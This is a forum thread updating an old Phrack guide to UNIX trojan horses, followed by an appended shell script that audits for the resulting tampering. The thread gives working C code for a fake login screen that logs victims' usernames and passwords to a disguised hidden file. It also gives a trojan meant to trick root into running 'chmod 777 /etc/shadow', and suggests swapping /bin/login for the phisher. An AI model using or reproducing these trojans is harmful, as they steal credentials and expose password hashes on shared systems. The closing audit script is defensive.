Gaining passwords
  • Last night I was browsing through some old phrack philes. I stumbled upon a pretty good guide by Shooting Shark titled UNIX Trojan Horses
    I read through it and thought to myself, this is a pretty good paper. Only thing is, it's pretty outdated :/ So I decided to update it a little. NOTE: Please read the original phrack issues (link above) before reading through this.

    Phishing passwords:
    I thought this method was pretty cool. The idea was to recreate a login system that users think is real. I tested it on myself but the C code was outdated and didn't work :/ What a shame. Well I fixed it up a bit. Take a look at it:

    //Horse.c - Updated version of Shooting Shark's phisher
    #include <stdio.h>
    #include <stdlib.h>   // system()
    #include <unistd.h>   // sleep()
    #include <string.h>   // strcspn()
    #define WAIT 3 //This will sleep for 3 seconds, emulating how long it takes after I log on
    #define INCORRECT "Login incorrect\n"
    #define FILENAME ".xintrc" //Hidden file that looks like the xinitrc ;)

    void stop(void);

    int main(void)
    {
        char name[10], password[10];
        FILE *fp;
        system("clear");
        printf("Arch Linux 2.6.36-ARCH (vandal) (tty1)\n\n");
        printf("vandal login: ");
        fgets(name, sizeof(name), stdin);
        name[strcspn(name, "\n")] = '\0';
        printf("Password: ");
        fgets(password, sizeof(password), stdin);
        password[strcspn(password, "\n")] = '\0';
        sleep(WAIT);

        if ((fp = fopen(FILENAME, "a")) != NULL)
        {
            fprintf(fp, "User: %s Password: %s\n", name, password);
            fclose(fp);
            stop();
        }

        printf(INCORRECT);
        return 0;
    }

    void stop(void)
    {
        _Exit(0);
    }

    So at first it spits out what my system looks like. It says Arch Linux 2.6.36-ARCH (vandal) (tty1). That's my machine name and current tty. Then I set the wait to 3 seconds to emulate how long it usually takes after logging in to a terminal on my system. It logs users and passwords to a file named .xintrc
    Here is a sample of the .xintrc file:

    User: chronic Password: urmom
    User: lol Password: lol
    User: mary Password: jane

    As you can see we get a nicely formatted password file :)

    Reading anybody's files:
    Of course this part was also out of date. After all, it's from '86. Anyway, if we look through we can see Shooting Shark has included the source of a program that chmod's a file to be rwxrwxrwx. Chmodded to 777. Of course this code is out of date, and it could be much simpler.

    #include <stdlib.h>   // system()

    int main(void)
    {
        system("chmod 777 lol");
        return 0;
    }

    This chmod's the file lol to 777, meaning anybody can read/write/execute it. Easy. Now you just need to get the root user (or any other user) to open it and have it chmod the file you want. For example, if we want the root user to chmod the file /etc/shadow you just change the source to this:

    #include <stdlib.h>   // system()

    int main(void)
    {
        system("chmod 777 /etc/shadow");
        return 0;
    }

    Bam, if the super user runs it, the /etc/shadow file is open to everybody. Of course you can add more system() lines to the source to have it perform more commands.

    Anyway, that's all. Figured I'd do a little update of that paper :)

    --chroniccommand
  • Oh and by the way, you can change /bin/login to the phisher and it should still log passwords and it will become the default login manager. Tried it on myself and it worked. Just make sure you make a backup of /bin/login first.
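Both tricks described in this thread leave a trace an administrator can check for: /etc/shadow with permission bits set for "other" users, and a /bin/login whose contents no longer match what the package manager installed. The audit script below is an added example, not code from the thread or from any project mentioned in it. It assumes GNU stat (for the octal %a format) and a baseline file that the administrator created beforehand with `sha256sum /bin/login > baseline`; the function names are this example's own.

```shell
#!/bin/sh
# Added audit example (not part of the original post).
# Flags files that grant any permission to "other" users and binaries
# that no longer match a recorded SHA-256 baseline.

# Return 0 when the file grants no permission bits to "other",
# 1 when it does, 2 when the file is missing.
# Relies on GNU stat's %a (octal mode), assumed available on Linux.
check_no_other_access() {
    path=$1
    [ -e "$path" ] || { echo "missing: $path"; return 2; }
    mode=$(stat -c '%a' "$path")
    # The last octal digit holds the permission bits for "other";
    # this also works for 4-digit modes such as 4755 (setuid).
    other=${mode#"${mode%?}"}
    if [ "$other" != "0" ]; then
        echo "WARN: $path has mode $mode (other=$other)"
        return 1
    fi
    return 0
}

# Compare a file's SHA-256 against a baseline file in sha256sum format
# ("<hash>  <path>" per line), recorded when the system was known-good.
# Return 0 on match, 1 on mismatch, 2 when no baseline entry exists.
check_baseline() {
    path=$1
    baseline_file=$2
    expected=$(awk -v p="$path" '$2 == p { print $1 }' "$baseline_file")
    [ -n "$expected" ] || { echo "no baseline entry for $path"; return 2; }
    actual=$(sha256sum "$path" | awk '{ print $1 }')
    if [ "$actual" != "$expected" ]; then
        echo "WARN: $path no longer matches its baseline hash"
        return 1
    fi
    return 0
}

# Run the checks the thread motivates: shadow files must not be readable
# by "other", and the login binary must match its baseline.
# Usage: audit [baseline_file]
audit() {
    rc=0
    check_no_other_access /etc/shadow  || rc=1
    check_no_other_access /etc/gshadow || rc=1
    if [ -n "$1" ]; then
        check_baseline /bin/login "$1" || rc=1
    fi
    return $rc
}
```

On Arch, the same integrity question can be put to the package manager with `pacman -Qkk util-linux`, which compares installed files against the package's recorded metadata; the baseline approach above is distribution-independent.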